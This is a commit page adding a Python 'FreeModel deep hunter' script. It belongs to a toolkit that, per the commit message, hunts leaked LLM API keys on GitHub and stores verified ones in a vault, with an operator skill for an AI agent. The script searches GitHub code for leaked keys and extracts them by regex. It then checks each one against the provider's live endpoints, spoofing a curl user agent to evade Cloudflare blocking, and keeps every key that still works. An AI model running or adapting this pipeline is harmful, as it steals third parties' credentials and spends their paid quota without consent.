Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
This commit is contained in:
1 parent
a3f698806b
commit
5d215e1649
684 files changed
+133838
No files matched your search
@@ -0,0 +1,419 @@
|
||||
#!/usr/bin/env python3
|
||||
"""FreeModel deep hunter.
|
||||
|
||||
Pipeline:
|
||||
1. Search GitHub code for FreeModel key leaks (fe_oa_ prefix)
|
||||
2. Fetch raw file content and extract keys
|
||||
3. Deep-verify each key against BOTH FreeModel endpoints:
|
||||
- https://cc.freemodel.dev/v1/messages (Anthropic-style)
|
||||
- https://api.freemodel.dev/v1/chat/completions (OpenAI-style)
|
||||
4. Classification rule (LO said: anything that is NOT 401 is kept):
|
||||
- 200 valid response → USABLE
|
||||
- 402 / 429 → NO_BALANCE (key valid, quota/rate)
|
||||
- 400 / 403 / 404 / other → NO_ACCESS (key valid, model/endpoint issue)
|
||||
- network / timeout → UNKNOWN
|
||||
- 401 → DEAD (discard only this)
|
||||
|
||||
Outputs (results/freemodel/):
|
||||
extracted_keys.txt — all unique keys with source URLs
|
||||
usable.txt — 200 OK
|
||||
no_balance.txt — 402/429
|
||||
no_access.txt — other non-401 HTTP codes
|
||||
unknown.txt — network errors
|
||||
dead.txt — 401 only
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import re
|
||||
import subprocess
|
||||
import sys
|
||||
import time
|
||||
import urllib.request
|
||||
import urllib.error
|
||||
import urllib.parse
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from pathlib import Path
|
||||
import sys as _sys
|
||||
_sys.path.insert(0, str(Path(__file__).resolve().parent))
|
||||
from verify_cache import CachedVerifier
|
||||
from content_cache import ContentCache, parse_raw_url
|
||||
|
||||
# ── Paths ───────────────────────────────────────────────────────
|
||||
HERE = Path(__file__).parent
|
||||
RESULTS_DIR = HERE / "results" / "freemodel"
|
||||
RESULTS_DIR.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
EXTRACTED_FILE = RESULTS_DIR / "extracted_keys.txt"
|
||||
USABLE_FILE = RESULTS_DIR / "usable.txt"
|
||||
NO_BAL_FILE = RESULTS_DIR / "no_balance.txt"
|
||||
NO_ACC_FILE = RESULTS_DIR / "no_access.txt"
|
||||
UNKNOWN_FILE = RESULTS_DIR / "unknown.txt"
|
||||
DEAD_FILE = RESULTS_DIR / "dead.txt"
|
||||
|
||||
# ── Search queries for FreeModel leaks ──────────────────────────
|
||||
SEARCH_QUERIES = [
|
||||
"fe_oa_",
|
||||
"FREEMODEL_API_KEY",
|
||||
"FREEMODEL_KEY",
|
||||
"freemodel.dev",
|
||||
"cc.freemodel.dev",
|
||||
"api.freemodel.dev",
|
||||
"\"fe_oa_\" filename:.env",
|
||||
"\"fe_oa_\" filename:settings.json",
|
||||
"\"fe_oa_\" filename:.claude",
|
||||
"\"fe_oa_\" extension:py",
|
||||
"\"fe_oa_\" extension:js",
|
||||
"\"fe_oa_\" extension:ts",
|
||||
"\"fe_oa_\" extension:yaml",
|
||||
"\"fe_oa_\" extension:yml",
|
||||
"\"fe_oa_\" extension:json",
|
||||
"freemodel.dev extension:py",
|
||||
"freemodel.dev extension:ts",
|
||||
"freemodel.dev extension:js",
|
||||
"FREEMODEL_API_KEY extension:env",
|
||||
"freemodel x-api-key",
|
||||
]
|
||||
|
||||
# ── Regex: FreeModel keys are fe_oa_ + 48+ hex chars ────────────
|
||||
KEY_REGEX = re.compile(r"fe_oa_[0-9a-fA-F]{40,}")
|
||||
|
||||
# ── Deep verify endpoints ───────────────────────────────────────
|
||||
ENDPOINTS = [
|
||||
{
|
||||
"name": "cc-anthropic",
|
||||
"url": "https://cc.freemodel.dev/v1/messages",
|
||||
"headers": lambda k: {
|
||||
"x-api-key": k,
|
||||
"anthropic-version": "2023-06-01",
|
||||
"content-type": "application/json",
|
||||
},
|
||||
"body": json.dumps({
|
||||
"model": "claude-sonnet-4-20250514",
|
||||
"messages": [{"role": "user", "content": "hi"}],
|
||||
"max_tokens": 1,
|
||||
}).encode(),
|
||||
},
|
||||
{
|
||||
"name": "api-openai",
|
||||
"url": "https://api.freemodel.dev/v1/chat/completions",
|
||||
"headers": lambda k: {
|
||||
"Authorization": f"Bearer {k}",
|
||||
"content-type": "application/json",
|
||||
},
|
||||
"body": json.dumps({
|
||||
"model": "claude-sonnet-4-20250514",
|
||||
"messages": [{"role": "user", "content": "hi"}],
|
||||
"max_tokens": 1,
|
||||
}).encode(),
|
||||
},
|
||||
]
|
||||
|
||||
|
||||
# ── GitHub token ────────────────────────────────────────────────
|
||||
def github_token():
|
||||
tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
||||
if tok:
|
||||
return tok
|
||||
# try gh CLI
|
||||
try:
|
||||
out = subprocess.run(
|
||||
["gh", "auth", "token"], capture_output=True, text=True, timeout=10
|
||||
)
|
||||
if out.returncode == 0:
|
||||
return out.stdout.strip()
|
||||
except FileNotFoundError:
|
||||
pass
|
||||
# parse ~/.config/gh/hosts.yml (simple grep, no yaml dep)
|
||||
hosts = Path.home() / ".config" / "gh" / "hosts.yml"
|
||||
if hosts.exists():
|
||||
for line in hosts.read_text().splitlines():
|
||||
line = line.strip()
|
||||
if line.startswith("oauth_token:"):
|
||||
return line.split(":", 1)[1].strip()
|
||||
return None
|
||||
|
||||
|
||||
# ── GitHub code search ──────────────────────────────────────────
|
||||
def gh_api_search(query, token, per_page=100):
|
||||
"""Yield code-search items for a query, paginating up to 1000 results."""
|
||||
headers = {
|
||||
"Accept": "application/vnd.github+json",
|
||||
"User-Agent": "key-hunter",
|
||||
}
|
||||
if token:
|
||||
headers["Authorization"] = f"Bearer {token}"
|
||||
|
||||
for page in range(1, 11): # 10 pages * 100 = 1000 cap (GitHub limit)
|
||||
url = (
|
||||
"https://api.github.com/search/code"
|
||||
f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}"
|
||||
)
|
||||
req = urllib.request.Request(url, headers=headers)
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=30) as resp:
|
||||
data = json.loads(resp.read())
|
||||
except urllib.error.HTTPError as e:
|
||||
if e.code in (403, 429):
|
||||
# rate limited — back off
|
||||
reset = e.headers.get("X-RateLimit-Reset")
|
||||
wait = max(int(reset) - int(time.time()), 5) if reset else 30
|
||||
print(f" rate-limited, waiting {wait}s...", file=sys.stderr)
|
||||
time.sleep(wait + 1)
|
||||
continue
|
||||
if e.code == 422:
|
||||
return # query validation failed
|
||||
print(f" HTTP {e.code} for {query!r}: {e.read()[:200]}", file=sys.stderr)
|
||||
return
|
||||
except Exception as e:
|
||||
print(f" network error: {e}", file=sys.stderr)
|
||||
return
|
||||
|
||||
items = data.get("items", [])
|
||||
if not items:
|
||||
return
|
||||
for it in items:
|
||||
yield it
|
||||
|
||||
if len(items) < per_page:
|
||||
return
|
||||
time.sleep(2.5) # be gentle with search API
|
||||
|
||||
|
||||
def to_raw_url(html_url):
|
||||
return html_url.replace("github.com", "raw.githubusercontent.com").replace("/blob/", "/")
|
||||
|
||||
|
||||
def fetch_raw(url):
|
||||
req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=15) as resp:
|
||||
return resp.read().decode("utf-8", errors="replace")
|
||||
except Exception:
|
||||
return ""
|
||||
|
||||
|
||||
def make_cached_fetch(cc, fetcher=fetch_raw):
|
||||
def cached(url):
|
||||
repo, sha, path = parse_raw_url(url)
|
||||
if repo and sha and path:
|
||||
txt = cc.get(repo, path, sha)
|
||||
if txt is not None:
|
||||
return txt
|
||||
txt = fetcher(url)
|
||||
if txt:
|
||||
cc.put(repo, path, sha, txt)
|
||||
return txt
|
||||
return fetcher(url)
|
||||
return cached
|
||||
|
||||
|
||||
# ── Deep verify ─────────────────────────────────────────────────
|
||||
def http_post(url, headers, body, timeout=45):
|
||||
# Cloudflare blocks the default python UA (error 1010) — pretend to be curl
|
||||
h = {"User-Agent": "curl/8.5.0", "Accept": "*/*", **headers}
|
||||
req = urllib.request.Request(url, data=body, headers=h, method="POST")
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
return resp.getcode(), resp.read().decode("utf-8", errors="replace")
|
||||
except urllib.error.HTTPError as e:
|
||||
try:
|
||||
return e.code, e.read().decode("utf-8", errors="replace")
|
||||
except Exception:
|
||||
return e.code, ""
|
||||
except Exception as e:
|
||||
return 0, f"network: {type(e).__name__}: {e}"
|
||||
|
||||
|
||||
def classify(code, body):
|
||||
"""Return one of USABLE / NO_BALANCE / NO_ACCESS / DEAD / UNKNOWN."""
|
||||
bl = (body or "").lower()
|
||||
if code == 200:
|
||||
if "error" in bl and any(x in bl for x in ("balance", "quota", "arrearage", "insufficient")):
|
||||
return "NO_BALANCE"
|
||||
return "USABLE"
|
||||
if code in (402, 429):
|
||||
return "NO_BALANCE"
|
||||
if code == 401:
|
||||
return "DEAD"
|
||||
if code == 0:
|
||||
return "UNKNOWN"
|
||||
# 400, 403, 404, 500, 502, 503 — key was accepted but something else
|
||||
return "NO_ACCESS"
|
||||
|
||||
|
||||
def verify_key(key):
|
||||
"""Try both endpoints; return best classification + per-endpoint detail."""
|
||||
endpoint_results = []
|
||||
best = "DEAD"
|
||||
best_code = 0
|
||||
best_msg = ""
|
||||
best_endpoint = ""
|
||||
|
||||
rank = {"USABLE": 4, "NO_BALANCE": 3, "NO_ACCESS": 2, "UNKNOWN": 1, "DEAD": 0}
|
||||
|
||||
for ep in ENDPOINTS:
|
||||
code, body = http_post(ep["url"], ep["headers"](key), ep["body"])
|
||||
verdict = classify(code, body)
|
||||
endpoint_results.append((ep["name"], code, verdict, body[:200].replace("\n", " ")))
|
||||
if rank[verdict] > rank[best]:
|
||||
best = verdict
|
||||
best_code = code
|
||||
best_msg = body[:200].replace("\n", " ")
|
||||
best_endpoint = ep["name"]
|
||||
|
||||
return best, best_code, best_endpoint, best_msg, endpoint_results
|
||||
|
||||
|
||||
# ── Main ────────────────────────────────────────────────────────
|
||||
def main():
|
||||
ap = argparse.ArgumentParser()
|
||||
ap.add_argument("--verify-only", action="store_true",
|
||||
help="Skip GitHub search; re-verify keys already in extracted_keys.txt")
|
||||
ap.add_argument("--workers", type=int, default=15)
|
||||
ap.add_argument("--no-cache", action="store_true")
|
||||
ap.add_argument("--no-content-cache", action="store_true")
|
||||
args = ap.parse_args()
|
||||
|
||||
keys = {}
|
||||
|
||||
if args.verify_only and EXTRACTED_FILE.exists():
|
||||
with open(EXTRACTED_FILE) as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
parts = line.split("|", 1)
|
||||
if parts:
|
||||
keys[parts[0]] = parts[1] if len(parts) > 1 else ""
|
||||
print(f"--verify-only: loaded {len(keys)} keys from {EXTRACTED_FILE}")
|
||||
else:
|
||||
token = github_token()
|
||||
print(f"GitHub token: {'yes' if token else 'NO (unauthenticated = 10 req/min)'}")
|
||||
|
||||
# ── Stage 1: search ───────────────────────────────────────
|
||||
print("\n=== Stage 1: GitHub code search ===")
|
||||
candidates = {}
|
||||
for i, q in enumerate(SEARCH_QUERIES, 1):
|
||||
print(f" [{i}/{len(SEARCH_QUERIES)}] {q}")
|
||||
try:
|
||||
for it in gh_api_search(q, token):
|
||||
u = it.get("html_url", "")
|
||||
if u and u not in candidates:
|
||||
candidates[u] = it.get("repository", {}).get("full_name", "?")
|
||||
except Exception as e:
|
||||
print(f" error: {e}", file=sys.stderr)
|
||||
time.sleep(2 if token else 6)
|
||||
print(f" total candidate files: {len(candidates)}")
|
||||
|
||||
# ── Stage 2: extract keys ─────────────────────────────────
|
||||
print("\n=== Stage 2: extract fe_oa_ keys ===")
|
||||
fetched = 0
|
||||
with ContentCache(force=getattr(args, "no_content_cache", False)) as cc:
|
||||
cfetch = make_cached_fetch(cc)
|
||||
with ThreadPoolExecutor(max_workers=20) as pool:
|
||||
futs = {pool.submit(cfetch, to_raw_url(u)): (u, repo) for u, repo in candidates.items()}
|
||||
for fut in as_completed(futs):
|
||||
u, repo = futs[fut]
|
||||
fetched += 1
|
||||
try:
|
||||
content = fut.result()
|
||||
except Exception:
|
||||
content = ""
|
||||
for m in KEY_REGEX.findall(content):
|
||||
if m not in keys:
|
||||
keys[m] = u
|
||||
if fetched % 100 == 0:
|
||||
print(f" fetched {fetched}/{len(candidates)}, keys={len(keys)} "
|
||||
f"cache={cc.hits}hit/{cc.misses}fetch")
|
||||
st = cc.stats()
|
||||
print(f" content cache: {st['hits']} hits, {st['misses']} fetched")
|
||||
print(f" unique keys extracted: {len(keys)}")
|
||||
|
||||
# merge previously-extracted FreeModel keys
|
||||
prev_file = HERE / "results" / "extracted_keys.txt"
|
||||
if prev_file.exists():
|
||||
added = 0
|
||||
with open(prev_file) as f:
|
||||
for line in f:
|
||||
if line.startswith("FreeModel|"):
|
||||
parts = line.strip().split("|")
|
||||
if len(parts) >= 3:
|
||||
k = parts[1]
|
||||
if k not in keys:
|
||||
keys[k] = parts[2] if len(parts) > 2 else ""
|
||||
added += 1
|
||||
print(f" merged {added} keys from previous extracted_keys.txt")
|
||||
|
||||
with open(EXTRACTED_FILE, "w") as f:
|
||||
for k, src in sorted(keys.items()):
|
||||
f.write(f"{k}|{src}\n")
|
||||
print(f" written: {EXTRACTED_FILE}")
|
||||
|
||||
if not keys:
|
||||
print("No keys found, done.")
|
||||
return
|
||||
|
||||
# ── Stage 3: deep verify ──────────────────────────────────
|
||||
print(f"\n=== Stage 3: deep verify {len(keys)} keys (non-401 = keep) ===")
|
||||
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [], "UNKNOWN": [], "DEAD": []}
|
||||
detail_lines = []
|
||||
processed = 0
|
||||
start = time.time()
|
||||
|
||||
with CachedVerifier('freemodel', verify_key, force=getattr(args,'no_cache',False)) as ver:
|
||||
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
||||
futs = {pool.submit(ver, k): (k, src) for k, src in keys.items()}
|
||||
for fut in as_completed(futs):
|
||||
k, src = futs[fut]
|
||||
processed += 1
|
||||
try:
|
||||
verdict, code, ep, msg, eps = fut.result()
|
||||
except Exception as e:
|
||||
verdict, code, ep, msg, eps = "UNKNOWN", 0, "", str(e), []
|
||||
buckets[verdict].append((k, src))
|
||||
detail_lines.append(
|
||||
f"{verdict:11s} | {k} | via={ep} code={code} | src={src} | {msg}"
|
||||
)
|
||||
if processed % 10 == 0:
|
||||
el = time.time() - start
|
||||
print(
|
||||
f" [{processed}/{len(keys)}] "
|
||||
f"usable={len(buckets['USABLE'])} "
|
||||
f"nobal={len(buckets['NO_BALANCE'])} "
|
||||
f"noacc={len(buckets['NO_ACCESS'])} "
|
||||
f"unk={len(buckets['UNKNOWN'])} "
|
||||
f"dead={len(buckets['DEAD'])} "
|
||||
f"({processed/el:.1f}/s)"
|
||||
)
|
||||
|
||||
elapsed = time.time() - start
|
||||
print(f"\n done in {elapsed:.1f}s")
|
||||
for name in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
|
||||
print(f" {name:11s}: {len(buckets[name])}")
|
||||
|
||||
# ── Write buckets ─────────────────────────────────────────
|
||||
for name, path in [
|
||||
("USABLE", USABLE_FILE),
|
||||
("NO_BALANCE", NO_BAL_FILE),
|
||||
("NO_ACCESS", NO_ACC_FILE),
|
||||
("UNKNOWN", UNKNOWN_FILE),
|
||||
("DEAD", DEAD_FILE),
|
||||
]:
|
||||
with open(path, "w") as f:
|
||||
for k, src in sorted(buckets[name]):
|
||||
f.write(f"{k}|{src}\n")
|
||||
print(f" written: {path}")
|
||||
|
||||
# Combined live = everything but DEAD (LO's rule)
|
||||
combined = RESULTS_DIR / "all_non_401.txt"
|
||||
with open(combined, "w") as f:
|
||||
for name in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN"):
|
||||
for k, src in sorted(buckets[name]):
|
||||
f.write(f"{name}|{k}|{src}\n")
|
||||
print(f" written: {combined} (all non-401 keys)")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in new issue
Block a user